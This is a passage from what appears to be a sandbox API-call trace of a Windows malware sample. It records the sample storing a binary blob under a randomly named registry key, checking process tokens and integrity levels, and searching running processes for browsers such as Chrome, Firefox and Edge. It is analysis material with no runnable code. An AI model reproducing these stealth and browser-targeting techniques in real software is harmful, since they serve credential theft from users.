arglist=0xcee84 | out: pszDest="85") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="34") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="F4") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="DC") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="B9") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="0B") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="92") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="F8") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="70") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="D8") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="AF") returned 2 [0313.179] CreateEventW (lpEventAttributes=0x877e4, bManualReset=1, bInitialState=0, lpName="6D67413DD28534F4DCB90B92F870D8AF") returned 0x100 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="C3") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="42") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="ED") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="8F") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="57") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="7B") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="41") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="9A") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="A8") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="1E") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="D4") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="8D") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="87") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="CE") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="C1") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="9C") returned 2 [0313.179] CreateEventW (lpEventAttributes=0x877e4, bManualReset=1, bInitialState=0, lpName="C342ED8F577B419AA81ED48D87CEC19C") returned 0x104 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="99") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="AB") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="C0") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="AC") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="EB") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="C9") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="54") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="12") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="B2") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="E5") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="32") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="10") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="6C") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="BC") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="13") returned 2 [0313.179] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="1F") returned 2 [0313.179] CreateEventW (lpEventAttributes=0x877e4, bManualReset=1, bInitialState=0, lpName="99ABC0ACEBC95412B2E532106CBC131F") returned 0x108 [0313.180] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7135f, lpParameter=0x4af870, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x10c [0313.180] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0x110 [0313.180] WaitForSingleObject (hHandle=0x110, dwMilliseconds=0xffffffff) returned 0x0 [0313.180] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0xce550 | out: phkResult=0xce550*=0x114) returned 0x0 [0313.180] RegQueryValueExW (in: hKey=0x114, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0xce57c, lpData=0x0, lpcbData=0xce564*=0x0 | out: lpType=0xce57c*=0x3, lpData=0x0, lpcbData=0xce564*=0x6f0) returned 0x0 [0313.180] RegQueryValueExW (in: hKey=0x114, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0xce57c, lpData=0x4af890, lpcbData=0xce564*=0x6f0 | out: lpType=0xce57c*=0x3, lpData=0x4af890*, lpcbData=0xce564*=0x6f0) returned 0x0 [0313.180] RegCloseKey (hKey=0x114) returned 0x0 [0313.180] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0xcef60 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 0x25 [0313.181] PathCombineW (in: pszDest=0xceb4e, pszDir="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", pszFile="azuqkihi" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\azuqkihi") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\azuqkihi" [0313.181] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\azuqkihi" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\azuqkihi")) returned 0xffffffff [0313.181] PathCombineW (in: pszDest=0xced56, pszDir="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", pszFile="xekeov" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\xekeov") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\xekeov" [0313.181] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\xekeov" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\xekeov")) returned 0xffffffff [0313.181] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0xce564, lpdwDisposition=0x0 | out: phkResult=0xce564*=0x114, lpdwDisposition=0x0) returned 0x0 [0313.181] RegSetValueExW (in: hKey=0x114, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0x4af8a8*, cbData=0x6f0 | out: lpData=0x4af8a8*) returned 0x0 [0313.181] RegCloseKey (hKey=0x114) returned 0x0 [0313.181] ReleaseMutex (hMutex=0x110) returned 1 [0313.181] CloseHandle (hObject=0x110) returned 1 [0313.181] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7c4a8, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x110 [0313.182] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x78f74, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0xcf160 | out: lpThreadId=0xcf160*=0x460) returned 0x114 [0313.182] CloseHandle (hObject=0x114) returned 1 Thread: id = 217 os_tid = 0x114 Thread: id = 218 os_tid = 0x614 [0313.183] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0313.183] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0315.471] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77cb0000 [0315.471] GetProcAddress (hModule=0x77cb0000, lpProcName="NtQuerySystemInformation") returned 0x77ccfda0 [0315.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x260fd04 | out: SystemInformation=0x0, ResultLength=0x260fd04*=0xac50) returned 0xc0000004 [0315.471] VirtualAlloc (lpAddress=0x0, dwSize=0xbc50, flAllocationType=0x1000, flProtect=0x4) returned 0x90000 [0315.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x90000, Length=0xbc50, ResultLength=0x0 | out: SystemInformation=0x90000, ResultLength=0x0) returned 0x0 [0315.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0315.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0315.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0315.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0315.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0315.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0315.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0315.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0315.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0315.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0315.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0315.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0315.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0315.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0315.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0315.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0315.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0315.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0315.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0315.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0315.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0xb4 [0315.473] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0315.473] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0315.473] GetLastError () returned 0x7a [0315.473] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43ba48, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43ba48, ReturnLength=0x260fcb4) returned 1 [0315.473] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0315.473] CloseHandle (hObject=0xb8) returned 1 [0315.473] CloseHandle (hObject=0xb4) returned 1 [0315.473] GetLengthSid (pSid=0x43ba50*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0315.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0xb4 [0315.473] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x260fc42, dwBuildNumber=0x8600e462, dwPlatformId=0x43c6a0, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0315.473] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0315.473] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0315.473] GetLastError () returned 0x7a [0315.473] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43caf8, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43caf8, ReturnLength=0x260fce0) returned 1 [0315.473] GetSidSubAuthorityCount (pSid=0x43cb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cb01 [0315.473] GetSidSubAuthority (pSid=0x43cb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cb08 [0315.473] CloseHandle (hObject=0xb8) returned 1 [0315.473] CloseHandle (hObject=0xb4) returned 1 [0315.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x43ba48, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0315.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x43ba48, cbMultiByte=11, lpWideCharStr=0x43bd38, cchWideChar=12 | out: lpWideCharStr="firefox.exe") returned 11 [0315.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x43ba60, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0315.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x43ba60, cbMultiByte=10, lpWideCharStr=0x43bd10, cchWideChar=11 | out: lpWideCharStr="chrome.exe") returned 10 [0315.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x43ba78, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0315.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x43ba78, cbMultiByte=9, lpWideCharStr=0x43cb38, cchWideChar=10 | out: lpWideCharStr="opera.exe") returned 9 [0315.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x43cb78, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0315.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x43cb78, cbMultiByte=12, lpWideCharStr=0x43bce8, cchWideChar=13 | out: lpWideCharStr="iexplore.exe") returned 12 [0315.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x43cbb8, cbMultiByte=17, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0315.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x43cbb8, cbMultiByte=17, lpWideCharStr=0x43c6a0, cchWideChar=18 | out: lpWideCharStr="MicrosoftEdge.exe") returned 17 [0315.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x43cbf8, cbMultiByte=19, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0315.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x43cbf8, cbMultiByte=19, lpWideCharStr=0x43c6d0, cchWideChar=20 | out: lpWideCharStr="MicrosoftEdgeCP.exe") returned 19 [0315.474] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0315.474] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0315.474] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0315.474] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0315.474] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0315.474] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0315.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0315.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x534) returned 0xb4 [0315.475] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0315.475] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0315.475] GetLastError () returned 0x7a [0315.475] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0315.475] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0315.475] CloseHandle (hObject=0xb8) returned 1 [0315.475] CloseHandle (hObject=0xb4) returned 1 [0315.475] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0315.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x534) returned 0xb4 [0315.475] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x96960, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0315.475] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0315.475] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0315.475] GetLastError () returned 0x7a [0315.475] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0315.475] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0315.475] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0315.475] CloseHandle (hObject=0xb8) returned 1 [0315.475] CloseHandle (hObject=0xb4) returned 1 [0315.475] lstrcmpiW (lpString1="firefox.exe", lpString2="userinit.exe") returned -1 [0315.475] lstrcmpiW (lpString1="chrome.exe", lpString2="userinit.exe") returned -1 [0315.475] lstrcmpiW (lpString1="opera.exe", lpString2="userinit.exe") returned -1 [0315.475] lstrcmpiW (lpString1="iexplore.exe", lpString2="userinit.exe") returned -1 [0315.475] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="userinit.exe") returned -1 [0315.475] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="userinit.exe") returned -1 [0315.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0xb4 [0315.475] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0315.475] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0315.476] GetLastError () returned 0x7a [0315.476] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0315.476] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0315.476] CloseHandle (hObject=0xb8) returned 1 [0315.476] CloseHandle (hObject=0xb4) returned 1 [0315.476] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0315.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0xb4 [0315.476] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x96fe0, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0315.476] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0315.476] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0315.476] GetLastError () returned 0x7a [0315.476] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0315.476] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0315.476] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0315.476] CloseHandle (hObject=0xb8) returned 1 [0315.476] CloseHandle (hObject=0xb4) returned 1 [0315.476] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0315.476] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0315.476] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0315.476] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0315.476] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0315.476] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0315.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0xb4 [0315.476] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0315.476] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0315.476] GetLastError () returned 0x7a [0315.476] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0315.477] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0315.477] CloseHandle (hObject=0xb8) returned 1 [0315.477] CloseHandle (hObject=0xb4) returned 1 [0315.477] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0315.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0xb4 [0315.477] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97178, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: 